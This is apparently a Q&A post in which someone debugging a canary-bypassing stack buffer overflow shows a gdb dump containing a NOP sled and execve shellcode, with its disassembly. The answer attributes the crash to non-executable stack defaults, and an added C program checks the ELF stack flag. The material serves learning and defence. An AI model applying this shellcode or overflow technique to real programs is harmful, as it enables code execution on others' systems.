I am performing a buffer overflow, by avoiding the canary through a memcpy to a pointer, as explained here. In short, you overwrite the address a pointer points to, with the address of the RET in the stack. So memcpy-ing to that pointer effectively overwrites RET.
Using gdb, I inject my NOP-sled + shellcode + address_overwrite just fine. I can see that RET, at 0xbffff52c, contains a desired address, 0xbffff4c0, that will land in the NOP sled.
(gdb) x /32xw $esp
0xbffff470: 0xbffff52c 0x0804a008 0x00000004 0x00000000
0xbffff480: 0x000003f3 0x08048327 0x90909087 0x90909090
0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4d0: 0x90909090 0x90909090 0x90909090 0xeb909090
0xbffff4e0: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c
(gdb)
0xbffff4f0: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8
0xbffff500: 0xffffdce8 0x69622fff 0x68732f6e 0xbffff52c
0xbffff510: 0xbffff5a8 0xb7ff5990 0x0000008f 0xbffff5a8
0xbffff520: 0xb7fd1ff4 0x0804a008 0xbffff5a8 0xbffff4c0
0xbffff530: 0x0804a008 0x0804a008 0x0000008f 0x00000001
0xbffff540: 0x00000801 0x00000000 0xbfff0000 0x002001ac
0xbffff550: 0x000081a4 0x00000001 0x000004ad 0x000004ad
0xbffff560: 0x00000000 0x00000000 0xb7fd0000 0x0000008f
However, running this I get the error below, even though the disassembly shows I landed good.
Program received signal SIGSEGV, Segmentation fault.
0xbffff4c0 in ?? ()
(gdb) disas 0xbffff4c0, + 10
Dump of assembler code from 0xbffff4c0 to 0xbffff4ca:
=> 0xbffff4c0: nop
0xbffff4c1: nop
0xbffff4c2: nop
0xbffff4c3: nop
0xbffff4c4: nop
0xbffff4c5: nop
0xbffff4c6: nop
0xbffff4c7: nop
0xbffff4c8: nop
0xbffff4c9: nop
Further below is the shellcode.
0xbffff4df: jmp 0xbffff500
0xbffff4e1: pop %esi
0xbffff4e2: mov %esi,0x8(%esi)
0xbffff4e5: xor %eax,%eax
0xbffff4e7: mov %al,0x7(%esi)
0xbffff4ea: mov %eax,0xc(%esi)
0xbffff4ed: mov $0xb,%al
0xbffff4ef: mov %esi,%ebx
... etc.
I used the shellcode from Smashing the stack, Appendix B, for the Linux system. Can you help me understand what's wrong?
You didn't say what OS you are on, or how you built your target program.
Assuming Linux and no -Wl,-z,execstack, modern Linux distributions default to -Wl,-z,noexecstack, which (surprise!) makes the stack non-executable.
You can read about some of the protection mechanisms here.
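The linker options named in the answer are recorded in the binary as the flags of its PT_GNU_STACK program header, so whether a build asks for an executable stack can be checked from the file itself. The following is an added example, not part of the original question or answer: the function names and the 84-byte sample image are constructed for illustration, and only little-endian ELF32/ELF64 files are handled.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define PT_GNU_STACK 0x6474e551u  /* program header written for -z execstack / -z noexecstack */
#define PF_X 0x1u                 /* execute bit in p_flags */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }
static uint64_t rd64(const uint8_t *p) { return rd32(p) | (uint64_t)rd32(p + 4) << 32; }

/* 1: stack marked executable, 0: marked non-executable,
 * 2: no PT_GNU_STACK (kernel applies its architecture default), -1: not a little-endian ELF or truncated */
int stack_exec_status(const uint8_t *img, size_t len)
{
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[5] != 1) return -1;
    int is64 = (img[4] == 2);                       /* EI_CLASS: 1 = ELF32, 2 = ELF64 */
    if ((!is64 && img[4] != 1) || (is64 && len < 64)) return -1;
    uint64_t phoff = is64 ? rd64(img + 32) : rd32(img + 28);
    uint16_t phentsize = rd16(img + (is64 ? 54 : 42));
    uint16_t phnum = rd16(img + (is64 ? 56 : 44));
    if (phoff > len || phentsize < (is64 ? 56 : 32)) return -1;
    for (uint16_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsize;
        if (off > len || len - off < phentsize) return -1;  /* header table runs past the file */
        if (rd32(img + off) == PT_GNU_STACK)
            return (rd32(img + off + (is64 ? 4 : 24)) & PF_X) ? 1 : 0;
    }
    return 2;
}

/* Constructed sample: minimal ELF32 image holding one program header of the given type and flags. */
size_t make_sample(uint8_t buf[84], uint32_t p_type, uint32_t p_flags)
{
    memset(buf, 0, 84);
    memcpy(buf, "\x7f" "ELF\x01\x01\x01", 7);    /* ELFCLASS32, little-endian, version 1 */
    buf[28] = 52; buf[42] = 32; buf[44] = 1;      /* e_phoff, e_phentsize, e_phnum */
    for (int i = 0; i < 4; i++) {
        buf[52 + i] = (uint8_t)(p_type >> (8 * i));   /* p_type at offset 0 of Elf32_Phdr */
        buf[76 + i] = (uint8_t)(p_flags >> (8 * i));  /* p_flags at offset 24 of Elf32_Phdr */
    }
    return 84;
}

int main(void)
{
    uint8_t img[84];
    printf("noexecstack build: %d\n", stack_exec_status(img, make_sample(img, PT_GNU_STACK, 6)));
    printf("execstack build:   %d\n", stack_exec_status(img, make_sample(img, PT_GNU_STACK, 7)));
    return 0;
}
```

On a real binary, `readelf -lW` prints the same header as the `GNU_STACK` line, with flags `RW` for a non-executable stack and `RWE` for an executable one.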